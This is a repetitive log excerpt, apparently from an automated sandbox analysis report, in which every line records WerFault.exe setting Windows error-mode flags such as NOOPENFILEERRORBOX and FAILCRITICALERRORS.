Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
